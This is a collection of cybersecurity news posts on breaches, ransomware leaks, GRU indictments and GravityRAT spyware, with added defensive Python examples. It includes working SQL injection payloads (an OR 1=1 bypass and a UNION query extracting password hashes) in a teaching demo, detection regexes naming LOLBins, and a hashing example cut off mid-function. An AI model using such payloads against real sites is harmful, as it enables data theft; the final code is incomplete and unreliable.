In order to comply with these obligations, organizations need to revamp the following practices.

  • DSR Fulfillment: Organizations will be met with a plethora of Data Subject Requests (DSRs) and will be required to fulfill them all within a specific time frame set by the regulations they must comply with. To make this process swift and seamless, organizations will have to automate their DSR fulfillment process.
  • Data Mapping: Organizations have stored immense amounts of data across internal and external systems that can be spread over many geographies. Quickly linking this data to its owner, to avoid delays, is where data mapping automation plays a quintessential part in complying with any data privacy regulation.
  • Vendor Assessment: Manually assessing your third-party vendors and your own organization is a tedious task that presents several bottlenecks and lacks collaboration. Whether you want to collaborate with key stakeholders or third-party vendors, an automated system is needed to simplify the assessment process.
  • Consent Management: Regulations such as the CCPA and GDPR require organizations to obtain freely given consent from consumers before processing their data. Doing this task manually leaves room for human error and wastes time and resources. Organizations need a universal consent capture system that makes this process faster while freeing up resources.
  • Breach Notification: Privacy regulations require organizations to send a notification in case of a breach. Under the GDPR, for example, Article 33 requires notifying the supervisory authority of a personal data breach within 72 hours of becoming aware of it, where feasible. Recognizing a breach and then sending out a notification by manual means makes it virtually impossible to meet that time frame. Automating the breach notification process can save organizations thousands in fines.
  • Privacy Policy Management: One of the core parts of any regulation is the need to revamp an organization’s privacy policies. These policies need to be in line with the data privacy regulations in order to comply. Organizations will need to revisit their privacy policies and change them according to the guidelines provided by these regulations.

Automation: the Future of Compliance

The future belongs to automation, and organizations will have to adopt it quickly if they hope to comply with global privacy regulations. Regardless of the current state of the world, data regulations are still going into effect and being enforced. An organization that hopes to comply with them needs a solution that automates its operations and manages all the aforementioned privacy requirements.

Aoife Harney says “Being able to clearly see when a client’s personal data was collected, what legal basis is relied upon for that activity, who accesses that information, and when it’s appropriate to erase is incredibly useful to any organization,” 

Organizations need to find a solution that will help them with their compliance requirements. Ideally that solution comes from a vendor that allows flexibility and customization and that takes suggestions from early adopters into account.

Organizations can also consider SECURITI.ai, which positions itself as the Privacy Leader offering a one-stop data privacy solution to businesses.

Authors:

Ramiz Shah, Digital Content Producer at SECURITI.ai

Anas Baig, Team Lead at SECURITI.ai

Pierluigi Paganini

(SecurityAffairs – hacking, automation)

The post How Automation can help you in Managing Data Privacy appeared first on Security Affairs.

Dynamic Data Resolver – Version 1.0.1 beta

Cisco Talos is releasing a new beta version of Dynamic Data Resolver (DDR) today. This release comes with a new architecture for samples using multi-threading. The process and thread tracing has been completely reimplemented.

We also fixed a few bugs and memory leaks. Another new feature is that the DDR backend now comes in two flavors: a release version and a debugging version. The latter improves code quality and bug hunting: it helps detect memory leaks and minor issues that are silently handled by the underlying DynamoRIO framework in the release version. We also improved the installer, and the IDA plugin is now installed to the user plugin directory instead of to the IDA installation directory under Program Files. The IDA plugin and all its dependencies are now installed automatically by a script.

Fantastic news! DDR has won the Hex-Rays IDA plugin contest 2020.


The post Dynamic Data Resolver – Version 1.0.1 beta appeared first on Cisco Blogs.

MMO game Street Mobster leaking data of 1.9 million users due to critical vulnerability

Researchers discovered that the MMO game Street Mobster was leaking data of 1.9 million users due to a critical SQL injection vulnerability.

Attackers could exploit the SQL Injection flaw to compromise the game’s database and steal user data.

Original Post: https://cybernews.com/street-mobster-game-leaking-data-of-2-million-players

The CyberNews.com Investigation team discovered a critical vulnerability in Street Mobster, a browser-based massively multiplayer online game created by Bulgarian development company BigMage Studios.

Street Mobster is a free-to-play, browser-based online game in the mafia empire genre where players manage a fictional criminal enterprise. The game boasts a player base of more than 1.9 million and stores a user record database that threat actors could access by performing an SQL injection (SQLi) attack on the game’s website.

The records that can be compromised by exploiting the SQLi vulnerability in Street Mobster potentially include the players’ usernames, email addresses, and passwords, as well as other game-related data that is stored on the database.

Fortunately, after we reported the vulnerability to BigMage Studios, CERT Bulgaria, and the Bulgarian data protection authority, the issue has been fixed by the developers and the user database is no longer accessible to potential attackers.


What is SQL Injection?

First documented back in 1998, SQLi is ranked by the Open Web Application Security Project (OWASP) as the number one web application security risk.

Even though this vulnerability is relatively easy to fix, researchers found that 8% of websites and web applications were still vulnerable to SQLi attacks in 2020, which from a security perspective is inexcusable. So much so, in fact, that UK internet service provider TalkTalk was hit with a record £400,000 fine over a cyberattack that involved SQLi.

The vulnerability arises when user-supplied input (from a form field or a URL parameter) is concatenated into a SQL query without being separated from the query’s syntax. Instead of treating the text as data, the database parses the attacker’s payload as part of the query and executes the attacker’s commands or returns data that would otherwise be inaccessible to unauthorized parties. Depending on the database engine and its privileges, attackers can push SQLi further, for example by writing files or code to the vulnerable server.

The fact that Street Mobster is susceptible to SQLi attacks clearly shows the disappointing and dangerous neglect of basic security practices on the part of the developers at BigMage Studios.
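The mechanism described above, and the fix that removes it, as an added example that is not CyberNews’ test or any of BigMage Studios’ code. It uses Python’s built-in sqlite3 module against a constructed in-memory users table (placeholder hashes, not real data); the two payloads are the classic boolean bypass and a UNION query, and the same lookup is shown with string concatenation and with a bound parameter.

```python
import sqlite3


def build_db():
    """In-memory users table with constructed rows (placeholder hashes, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, email TEXT);
        INSERT INTO users (username, password_hash, email) VALUES
            ('alice', 'hash-alice', 'alice@example.invalid'),
            ('bob',   'hash-bob',   'bob@example.invalid');
    """)
    return conn


def find_user_vulnerable(conn, username):
    # VULNERABLE: the input is spliced into the query text, so a quote, an OR
    # or a comment sequence in it is parsed as SQL rather than as a name.
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    # HARDENED: the statement text is fixed and the value travels as a bound
    # parameter, so it can never change the structure of the query.
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Two constructed payloads. The trailing "--" comments out the closing quote
# that the vulnerable query appends.
BYPASS = "' OR 1=1 --"                                            # returns every row
EXFIL = "x' UNION SELECT username, password_hash FROM users --"   # pulls a different column


def demo():
    conn = build_db()
    return {
        "vuln_bypass": find_user_vulnerable(conn, BYPASS),
        "vuln_exfil": find_user_vulnerable(conn, EXFIL),
        "safe_bypass": find_user_safe(conn, BYPASS),   # looks for a user literally named "' OR 1=1 --"
        "safe_normal": find_user_safe(conn, "alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable lookup returns both users for the bypass payload and hands back password hashes for the UNION payload; the parameterised lookup returns nothing for either, because the payload is compared as a plain string. That is the whole fix: the query shape is decided by the code, never by the request.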

How we found this vulnerability

Our security team identified an SQL injection vulnerability on the Street Mobster website and confirmed it by performing a simple injection test against a parameter in the website URL. The CyberNews team did not extract any data from the vulnerable Street Mobster database.

What’s the impact of the vulnerability?

The data in the vulnerable Street Mobster database can be used in a variety of ways against the players whose information was exposed:

  • By injecting malicious payloads into Street Mobster’s server, attackers could potentially gain access to the server itself, install malware on the game’s website and harm its visitors, from using the players’ devices to mine cryptocurrency to redirecting them to other malicious websites, installing malware and more.
  • The 1.9 million user credentials stored on the database can net the attackers user email addresses and passwords, which they can potentially use for credential stuffing attacks to hack the players’ accounts on other gaming platforms like Steam or other online services.
  • Because Street Mobster is a free-to-play game that incorporates microtransactions, bad actors could also make a lot of money from selling hacked player accounts on gray market websites.

What to do if you’ve been affected?

If you have a Street Mobster account, change your password immediately and choose a strong, unique one. If you have been using your Street Mobster password on any other websites or services, change that password as well. This prevents attackers from accessing your accounts on those sites if they try to reuse your password in credential stuffing attacks.

However, it’s ultimately up to BigMage Studios to completely secure your Street Mobster account against attacks like SQLi.

Disclosure and lack of communication from BigMage Studios

Following our vulnerability disclosure guidelines, we notified BigMage Studios about the leak on August 31, 2020. However, we received no reply. Our follow-up emails were left unanswered as well.

We then reached out to CERT Bulgaria on September 11 in order to help secure the website. CERT contacted BigMage Studios and informed the company about the vulnerability.

Throughout the disclosure process, BigMage Studios stayed radio silent and refused to get in touch with CyberNews.com. For this reason, we also notified the Bulgarian data protection agency about the incident on October 9, in the hope that the agency would be able to pressure the company into fixing the issue.

Eventually, however, BigMage Studios appear to have fixed the SQLi vulnerability on streetmobster.com, without informing either CyberNews.com or CERT Bulgaria of that fact.

Pierluigi Paganini

(SecurityAffairs – hacking, Street Mobster)

The post MMO game Street Mobster leaking data of 1.9 million users due to critical vulnerability appeared first on Security Affairs.

Nefilim ransomware gang published Luxottica data on its leak site

The Nefilim ransomware operators have posted a long list of files that appear to belong to Italian eyewear and eyecare giant Luxottica.

Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch.

Luxottica employs over 80,000 people and generated 9.4 billion in revenue for 2019.

On September 18, the company was hit by a cyberattack; some of the websites it operates were not reachable, including Ray-Ban, Sunglass Hut, LensCrafters, EyeMed and Pearle Vision.

Italian media outlets reported that the operations at the plants of Luxottica in Agordo and Sedico (Italy) were disrupted due to a computer system failure. Union sources confirmed that the personnel at the plants received an SMS in which they were notified that “the second workshift of today 21 September is suspended” due to “serious IT problems”.

BleepingComputer, citing the security firm Bad Packets, speculated that the Italian company was using a Citrix ADC appliance vulnerable to the critical CVE-2019-19781 vulnerability in Citrix devices.

At the time, Luxottica had yet to release any official statement on the attack.

Security experts believe the threat actor exploited the above flaw to infect the company’s systems with ransomware.

Now we have more information about the incident, which appears to be the result of a ransomware attack.

The popular Italian cyber security expert Odysseus first revealed on the web site “Difesa e Sicurezza” that the Nefilim ransomware operators have posted a long list of files that appear to belong to Luxottica.

The huge trove of files appears to be related to the personnel office and finance departments.


The analysis of the leaked files revealed that they contain confidential information regarding the recruitment process, professional resumes, and info about the internal structures of the Group’s human resource department.

The exposed financial data includes budgets, marketing forecast analysis, and other sensitive data.

The Nefilim ransomware operators also published a message accusing Luxottica of having failed to properly manage the attack.

In the past months, the number of ransomware attacks has surged; numerous ransomware gangs have made the headlines by targeting organizations worldwide and threatening to release the stolen data if the ransom is not paid.

“Extortion is the “new deal” of cybercrime: now, more than in the past, companies can’t “hide” the cyber attack anymore. Now it becomes mandatory to “manage” the breach from the communication perspective: dissembling is useless and harmful.” explained Odysseus. “And again, defending companies from cyber attacks becomes even more strategic: data leak damages can generate a tremendous amount of costs for companies worldwide.”

One of the crews that adopted this double-extortion model is the Nefilim ransomware gang, which has targeted several organizations including the mobile network operator Orange, the SPIE Group (an independent European leader in multi-technical services) and the Dussmann Group, Germany’s largest private multi-service provider.

Pierluigi Paganini

(SecurityAffairs – hacking, Luxottica)

The post Nefilim ransomware gang published Luxottica data on its leak site appeared first on Security Affairs.

Pay it safe: Group-IB aids Paxful in repelling a series of web-bot attacks

Group-IB assisted Paxful, an international peer-to-peer cryptocurrency marketplace, in countering web-bot and social engineering attacks

Group-IB, a global threat hunting and intelligence company headquartered in Singapore, has assisted Paxful, an international peer-to-peer cryptocurrency marketplace, in countering a wave of web-bot and social engineering attacks and customer account takeovers. Powered by Group-IB’s online fraud prevention solution, Secure Portal, the platform fought off over 220,000 requests from web bots in just two months, shielding its 4.5 million customers against possible attacks. The figure suggests that bitcoin platforms remain of great interest to threat actors.

Cryptocurrencies, in general, are the apple of cybercriminals’ eye: Group-IB has alerted cryptocurrency holders to various scams on numerous occasions. Fake giveaways, non-existent cryptocurrency investment platforms and personal-data-exposing schemes have claimed hundreds of thousands of victims.

The online threats that Paxful faced before acquiring Secure Portal ranged from social engineering attacks to customer account takeover, which is not surprising given the popularity of cryptocurrencies. But it was the detection and prevention of bad-bot activity that pushed Paxful to adopt an additional layer of cybersecurity and turn to Group-IB. Bots, which are reported to generate about a quarter of global web traffic, are programs that emulate the actions of a real device for whatever purpose their operator needs. They are a big headache for e-commerce businesses today, with cybercriminals using them to steal money, brute-force user credentials or carry out DDoS attacks.

The brute-forcing of user credentials was the case with Paxful. To thwart bad-bot activity, Group-IB Secure Portal creates a unique fingerprint of a device based on over a dozen indicators and metrics, including the user agent, platform, operating system, the time zone from which the user operates, device language and others. Based on this fingerprint and on behavioral analysis, Group-IB Secure Portal identifies and raises an alert for any suspicious activity in real time, after which Paxful uses the detection to block bad bots.

Trojans have also been spotted in the attacks on the marketplace: Group-IB Secure Portal identified at least 1,200 user devices infected with Trojans. Malware detection is considerably facilitated by the fact that Secure Portal is fed with information on threat actors, the behavior of different malware strains, malicious IPs and compromised data such as login credentials or bank card data, drawn from Group-IB’s attribution-based Threat Intelligence, a proprietary system that holds up-to-date data on advanced attackers and their TTPs.

Group-IB Secure Portal also managed to identify over 100,000 accounts with three or more logins from the same device. Some of these accounts were simply compromised, others were used to boost rank on the platform for further fraud activity or were just resold. 
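The two detections described above (a device fingerprint built from user agent, platform, OS, time zone and language; devices that hammer many accounts; and one device logging into three or more distinct accounts) as an added example. It is my own sketch, not Group-IB’s Secure Portal, and it assumes a much simpler fingerprint than the "over a dozen" signals the text mentions; the three device profiles and the login events are constructed, and I read "accounts with three or more logins from the same device" as one device being used for three or more distinct accounts.

```python
import hashlib
from collections import defaultdict

# Attributes folded into the fingerprint (a subset of what the text lists).
FP_FIELDS = ("ua", "platform", "os", "tz", "lang")

# Three constructed device profiles (not real telemetry).
DEV_A = {"ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/86.0", "platform": "Win32",
         "os": "Windows 10", "tz": "Europe/Berlin", "lang": "de-DE"}
DEV_B = {"ua": "python-requests/2.24.0", "platform": "", "os": "", "tz": "UTC", "lang": ""}
DEV_C = {"ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) Safari/604.1",
         "platform": "iPhone", "os": "iOS 14", "tz": "America/New_York", "lang": "en-US"}


def _ev(account, dev, ok):
    """One login event: account name, success flag, plus the device attributes."""
    return {"account": account, "ok": ok, **dev}


# Constructed login log: a farm device, a credential-spraying bot, an ordinary user.
LOGINS = (
    [_ev(a, DEV_A, True) for a in ("u1", "u2", "u3", "u4")]                 # one device, four accounts
    + [_ev(a, DEV_B, False) for a in ("u5", "u6", "u7", "u8", "u9", "u10")]  # spray of failures...
    + [_ev("u10", DEV_B, True)]                                              # ...and one hit
    + [_ev("u11", DEV_C, True), _ev("u11", DEV_C, False), _ev("u11", DEV_C, True)]
)


def device_fingerprint(ev):
    """Stable identifier derived from the client-reported attributes."""
    material = "\x1f".join(ev.get(k, "") for k in FP_FIELDS)
    return hashlib.sha256(material.encode("utf-8")).hexdigest()[:16]


def accounts_per_device(events, threshold=3):
    """Devices that successfully logged into `threshold` or more distinct accounts."""
    seen = defaultdict(set)
    for ev in events:
        if ev["ok"]:
            seen[device_fingerprint(ev)].add(ev["account"])
    return {fp: sorted(accts) for fp, accts in seen.items() if len(accts) >= threshold}


def brute_force_devices(events, max_failures=5):
    """Devices whose failed logins exceed `max_failures`, with how many accounts they tried."""
    failures = defaultdict(int)
    targets = defaultdict(set)
    for ev in events:
        if not ev["ok"]:
            fp = device_fingerprint(ev)
            failures[fp] += 1
            targets[fp].add(ev["account"])
    return {fp: {"failures": n, "accounts_tried": len(targets[fp])}
            for fp, n in failures.items() if n > max_failures}


if __name__ == "__main__":
    print("shared devices:", accounts_per_device(LOGINS))
    print("brute-force devices:", brute_force_devices(LOGINS))
```

Every attribute in this fingerprint is supplied by the client and can be spoofed or randomised by a bot, which is why a fingerprint on its own is only a correlation key; the behavioural counts (distinct accounts per device, failures per device) are what turn it into a detection, and the thresholds here are illustrative rather than tuned.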

“For Paxful, Group-IB was the perfect solution; we were particularly impressed by the accuracy of Group-IB’s device fingerprint technology,” comments Dmitry Moiseev, the Chief Information Security Officer at Paxful. “The unique technology that easily detects suspicious devices is exactly what we were looking for. Interactive graph visualization tools and strong API create a truly comprehensive experience when it comes to fraud investigation. With reliable and helpful technical support, Group-IB is a well-rounded cybersecurity solution that works for us.” 

With the deployment of Group-IB Secure Portal, Paxful is now even better equipped to mitigate fraud and prevent digital crimes well before they are even close to affecting the company’s multimillion customer base. 

“Businesses are struggling more than ever today and to ensure that their customers are safe from fraud when using online services is the new normal,” comments Group-IB International Business Development Director Nicholas Palmer. “Online fraud is one of the biggest hurdles on the path toward achieving a positive client experience. For online platforms, it is extremely important to ensure the safety of its users and the integrity of its cybersecurity, whose perimeter should extend to end-point devices and the protection of its clients. Group-IB Secure Portal is implementing this philosophy through its patented clientless detection technology, which protects clients’ customers without need for the latter to install any additional apps.”

About Group-IB Secure Portal

Group-IB Secure Portal is a client-side fraud prevention solution working across sessions, platforms, and devices in real time.

Group-IB Secure Portal effectively detects and prevents dangerous activities through behavior analysis, anomaly detection, daily automatic filter rule and signature updates based on unique data from Group-IB’s Threat Intelligence.

The combination of advanced anti-fraud technologies and intelligence protects both banking and retail customers. Moreover, it helps comply with legal requirements designed to protect funds belonging to individuals and companies against scammers.   

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services.

Group-IB is a partner of INTERPOL, Europol, and has been recommended by the OSCE as a cybersecurity solutions provider.

Pierluigi Paganini

(SecurityAffairs – hacking, Paxful)

The post Pay it safe: Group-IB aids Paxful in repelling a series of web-bot attacks appeared first on Security Affairs.

U.S. Charges Russia GRU Intelligence Officers for notorious attacks, including NotPetya

The U.S. DoJ announced charges against six Russian intelligence officers for their role in several major cyberattacks carried out over the last years.

The U.S. Department of Justice announced charges against six members of Russia’s GRU military intelligence agency for their alleged role in several major cyberattacks conducted over the past years.

The defendants are Yuriy Sergeyevich Andrienko, aged 32, Sergey Vladimirovich Detistov, 35, Pavel Valeryevich Frolov, 28, Anatoliy Sergeyevich Kovalev, 29, Artem Valeryevich Ochichenko, 27, and Petr Nikolayevich Pliskin, 32.

The six Russian intelligence officers are believed to be members of the Russia-linked Sandworm APT group (aka Telebots, Iron Viking and Voodoo Bear).

According to the indictment, the GRU officers were involved in attacks on Ukraine, including the attacks aimed at the country’s power grid in 2015 and 2016 that employed the BlackEnergy and Industroyer malware.

The US DoJ charged the men with damaging protected computers, conspiracy to conduct computer fraud and abuse, wire fraud, conspiracy to commit wire fraud, and aggravated identity theft.

Government experts linked the Russian APT group to major attacks, including NotPetya, a hacking operation targeting the 2017 French elections, the attack against the 2018 PyeongChang Winter Olympics that involved the Olympic Destroyer malware, and a series of attacks on Georgian companies and government organizations.

“Their computer attacks used some of the world’s most destructive malware to date, including: KillDisk and Industroyer, which each caused blackouts in Ukraine; NotPetya, which caused nearly $1 billion in losses to the three victims identified in the indictment alone; and Olympic Destroyer, which disrupted thousands of computers used to support the 2018 PyeongChang Winter Olympics.” reads the press release published by the DoJ. “The indictment charges the defendants with conspiracy, computer hacking, wire fraud, aggravated identity theft, and false registration of a domain name.”

From November 2015 until at least October 2019, the defendants and their co-conspirators developed and deployed destructive malware and took part in disruptive hacking campaigns.

Below is the list of overt acts attributed to each defendant:

  • Yuriy Sergeyevich Andrienko: developed components of the NotPetya and Olympic Destroyer malware.
  • Sergey Vladimirovich Detistov: developed components of the NotPetya malware; prepared spearphishing campaigns targeting the 2018 PyeongChang Winter Olympic Games.
  • Pavel Valeryevich Frolov: developed components of the KillDisk and NotPetya malware.
  • Anatoliy Sergeyevich Kovalev: developed spearphishing techniques and messages used to target En Marche! officials, employees of the DSTL, members of the IOC and Olympic athletes, and employees of a Georgian media entity.
  • Artem Valeryevich Ochichenko: participated in spearphishing campaigns targeting 2018 PyeongChang Winter Olympic Games partners; conducted technical reconnaissance of the Parliament of Georgia official domain and attempted to gain unauthorized access to its network.
  • Petr Nikolayevich Pliskin: developed components of the NotPetya and Olympic Destroyer malware.

The FBI added the defendants to the Cyber’s Most Wanted list.

“The FBI has repeatedly warned that Russia is a highly capable cyber adversary, and the information revealed in this indictment illustrates how pervasive and destructive Russia’s cyber activities truly are,” said FBI Deputy Director David Bowdich.  “But this indictment also highlights the FBI’s capabilities.  We have the tools to investigate these malicious malware attacks, identify the perpetrators, and then impose risks and consequences on them.  As demonstrated today, we will relentlessly pursue those who threaten the United States and its citizens.”

“For more than two years we have worked tirelessly to expose these Russian GRU Officers who engaged in a global campaign of hacking, disruption and destabilization, representing the most destructive and costly cyber-attacks in history,” said Scott Brady, U.S. Attorney for the Western District of Pennsylvania. “The crimes committed by Russian government officials were against real victims who suffered real harm. We have an obligation to hold accountable those who commit crimes – no matter where they reside and no matter for whom they work – in order to seek justice on behalf of these victims.”


Pierluigi Paganini

(SecurityAffairs – hacking, intelligence)

The post U.S. Charges Russia GRU Intelligence Officers for notorious attacks, including NotPetya appeared first on Security Affairs.

Is poor cyber hygiene crippling your security program?

Cybercriminals are targeting vulnerabilities created by the pandemic-driven worldwide transition to remote work, according to Secureworks. The report is based on hundreds of incidents the company’s IR team has responded to since the start of the pandemic.

Threat level is unchanged

While initial news reports predicted a sharp uptick in cyber threats after the pandemic took hold, data on confirmed security incidents and genuine threats to customers show the threat level is largely unchanged. Instead, … More

The post Is poor cyber hygiene crippling your security program? appeared first on Help Net Security.

GravityRAT malware also targets Android and macOS

Researchers spotted new variants of the Windows GravityRAT spyware that now can also infect Android and macOS devices.

Researchers from Kaspersky Lab have spotted new variants of the GravityRAT malware that now can be also used to infect Android and macOS devices.

GravityRAT is a malware strain known for checking the CPU temperature of Windows computers to avoid being executed in sandboxes and virtual machines.

GravityRAT, a Remote Access Trojan (RAT), is believed to be the work of Pakistani hacker groups and has been under development since at least 2015.

“Today, Cisco Talos is uncovering a new piece of malware, which has remained under the radar for the past two years [since 2015] while it continues to be developed.” reads an analysis published by Cisco Talos that spotted the malware back in 2017 when it was used by an APT group targeting India.

The sample analyzed by Kaspersky last year is able to infect macOS and Android devices, unlike past variants that were focused on Windows.

Crooks also started using digital signatures to make the apps look more legitimate.

The malware researchers found the new Android GravityRAT sample in 2019, on VirusTotal. The hackers had added a spy module to Travel Mate, an Android app for travelers to India whose source code is available on GitHub.


The tainted app is able to steal contacts, emails, and documents from the infected device and send them back to the command-and-control server (nortonupdates[.]online). The same C&C server was also associated with two other malicious apps (Enigma and Titanium) targeting the Windows and macOS platforms.

The spyware is able to get information about the system and support multiple features, including:

  • search for files on the computer and removable disks with the extensions .doc, .docx, .ppt, .pptx, .xls, .xlsx, .pdf, .odt, .odp, and .ods, and upload them to the server
  • get a list of running processes
  • intercept keystrokes
  • take screenshots
  • execute arbitrary shell commands
  • record audio (not implemented in this version)
  • scan ports

The malware was distributed via applications that clone legitimate apps and act as downloaders for the GravityRAT payloads.

The applications analyzed by Kaspersky were developed in .NET, Python and the Electron framework; they achieve persistence by adding a scheduled task.
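Scheduled-task persistence of the kind described above is cheap to hunt for on the endpoint. The following is an added example, not code from the original post or from Kaspersky: it parses the CSV that `schtasks /query /v /fo CSV` exports and flags tasks whose command runs from a user-writable directory or invokes a script interpreter, which is how a .NET, Python or Electron dropper installed under the user profile typically persists. The sample CSV is constructed and keeps only a subset of the real columns; the task names, paths, users and the user-writable path list are assumptions for illustration.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /v /fo CSV` output: only a subset of the real
# columns is kept, and the task names, paths and users are invented for illustration.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS01","\Enigma Updater","Ready","WS01\alice","C:\Users\alice\AppData\Roaming\Enigma\Enigma.exe --background","WS01\alice"
"WS01","\TitaniumSync","Ready","WS01\alice","C:\Users\alice\AppData\Local\Programs\Python\python.exe C:\Users\alice\AppData\Local\Temp\sync.py","WS01\alice"
"WS01","\GoogleUpdateTaskMachineUA","Ready","","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM"
'''

# Locations a standard user can write to; a legitimate installer rarely schedules a
# task whose binary lives here. Assumed list, extend it per environment.
USER_WRITABLE = re.compile(
    r"(?i)(\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Downloads\\|\\ProgramData\\|%temp%|%appdata%|%localappdata%)"
)
# Interpreters and LOLBins that droppers written in Python, Node or script form need at run time.
INTERPRETERS = re.compile(
    r"(?i)\b(python\d*|pythonw|node|electron|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b"
)


def suspicious_tasks(csv_text):
    """Return [(task_name, command, [reasons])] for tasks that deserve a second look."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        command = row.get("Task To Run", "") or ""
        reasons = []
        if USER_WRITABLE.search(command):
            reasons.append("runs from user-writable path")
        if INTERPRETERS.search(command):
            reasons.append("invokes a script interpreter or LOLBin")
        if reasons:
            findings.append((row["TaskName"], command, reasons))
    return findings


if __name__ == "__main__":
    for name, command, reasons in suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{name}: {command}\n    -> {'; '.join(reasons)}")
```

Because it works on exported text, the script runs anywhere; on a fleet, feed it the CSV collected from each host and triage the hits rather than alerting on them blindly, since legitimate per-user updaters also live under AppData.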

The researchers reported that the malware was employed in approximately 100 successful attacks between 2015 and 2018. The list of targets includes employees at defense, police, and other departments and organizations.

The attackers contacted victims through a fake Facebook account and then tricked them into installing a malicious app disguised as a secure messenger in order to continue the conversation, most likely by sending the victims download links.

“It is safe to assume that the current GravityRAT campaign uses similar infection methods — targeted individuals are sent links pointing to malicious apps.” concludes Kaspersky.

“The main modification seen in the new GravityRAT campaign is multiplatformity: besides Windows, there are now versions for Android and macOS. The cybercriminals also started using digital signatures to make the apps look more legitimate.”

Pierluigi Paganini

(SecurityAffairs – hacking, GravityRAT)

The post GravityRAT malware also targets Android and macOS appeared first on Security Affairs.

Alexander Vinnik, the popular cyber criminal goes on trial in Paris

The Russian citizen Alexander Vinnik goes on trial in Paris for having defrauded nearly 200 victims across the world of 135 million euros using ransomware.

The Russian man Alexander Vinnik goes on trial in Paris for having defrauded nearly 200 victims across the world of 135M euros using ransomware.

Alexander Vinnik allegedly ran the Bitcoin exchange BTC-e; he faces hacking-related charges in Russia, France, and the United States.

In 2017, Greek police arrested Vinnik and accused him of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of cryptocurrency.


According to the authorities, since 2011 about 7 million Bitcoin had flowed into the BTC-e exchange and 5.5 million had been withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

US authorities charged the man with fraud and money laundering involving more than $4 billion worth of Bitcoin (BTC) derived from criminal activities, and US prosecutors requested his extradition in July 2017.

Vinnik is also accused of being responsible for the failure of the Japanese bitcoin exchange Mt. Gox.

Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist: a Greek lower court agreed to extradite Vinnik to France to face charges of hacking, money laundering, extortion and involvement in organized crime.

French authorities accused Vinnik of defrauding more than 100 people in six French cities between 2016 and 2018.

French prosecutors revealed that among the 188 victims of the Vinnik’s attacks, there were local authorities, businesses, and individuals across the world.

Vinnik continues to deny the charges of extortion and money laundering and has not answered magistrates’ questions.

“Prosecutors identified 20 businesses in six cities across France among the victims and following the money trail through various bank accounts — as much as $8 million — identified one as belonging to Vinnik.” reported the AFP news.

In June, New Zealand police froze NZ$140 million (US$90 million) in assets linked to a Russian cybercriminal. They worked closely with the US Internal Revenue Service on the case, and the investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Alexander Vinnik, the popular cyber criminal goes on trial in Paris appeared first on Security Affairs.

The forum of the popular Albion Online game was hacked

Albion Online game maker discloses a data breach, hackers gained access to the company forum database by exploiting a known vulnerability.

Albion Online (AO) is a free medieval fantasy MMORPG developed by Sandbox Interactive, a studio based in Berlin, Germany.

A threat actor breached the forum of Albion Online and stole usernames and password hashes from its database.

According to Sandbox Interactive, the intrusion took place on Friday, October 16, and the hacker exploited a vulnerability in its forum platform, known as WoltLab Suite.

“Unfortunately, we have become aware of a data breach in one of our systems, in which a malicious actor gained access to parts of our forum’s user database.” reads the message published on the forum.

“The intruder was able to access forum user profiles, which include the e-mail addresses connected to those forum accounts. On top of that, the attacker gained access to encrypted passwords (in technical terms: hashed and salted passwords).”


The moderator of the forum pointed out that the intruder did not access payment information.

According to Sandbox Interactive, the passwords were hashed with bcrypt, which incorporates a random per-password salt into each hash; that makes the hashes hard to crack unless the password itself is weak.

“However, there is a small possibility they could be used to identify accounts with particularly weak passwords.” continues the German game maker.
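To make the point concrete (a salted, slow hash protects everyone except users with weak passwords), here is an added example, not Sandbox Interactive’s code. bcrypt is not in the Python standard library, so the example substitutes PBKDF2-HMAC-SHA256 from hashlib, which shares the two properties that matter here: a random per-password salt and a tunable cost. The users, passwords, wordlist and iteration count are constructed assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed cost; raise it until one hash costs ~100 ms on the serving hardware


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password, as bcrypt does internally
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, record):
    """Recompute the hash with the stored salt and cost; compare in constant time."""
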